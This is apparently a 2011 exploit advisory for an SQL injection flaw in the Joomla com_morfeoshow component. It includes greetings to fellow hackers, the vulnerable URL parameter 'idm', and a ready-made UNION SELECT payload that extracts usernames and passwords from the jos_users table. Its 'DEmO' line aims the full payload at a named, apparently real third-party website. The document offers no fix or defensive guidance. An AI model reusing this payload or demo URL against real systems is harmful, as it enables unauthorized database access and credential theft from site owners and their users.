The Joomla Morfeoshow component suffers from a remote SQL injection vulnerability.
f0513e531f01b35236a0534aabd543bb3d35bed8f9b1e51b7ed289636efb1e05
#############################################################
Joomla Component com_morfeoshow SQL Injection Vulnerability
#############################################################
# Author : Th3.xin0x
# Greetz : P0fk - ksha - S[e]C -seth - pks - xacks - OzX All My Friends :)
# special thanks to: www.mitm.cl - https://foro.undersecurity.net
# Name : Joomla com_morfeoshow
# Bug Type : SQL injection
+--+ Example:
site.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=
+--+ EXPLOIT :
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
+--+ DEmO
http://www.ucinf.cl/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
[2011-06-26]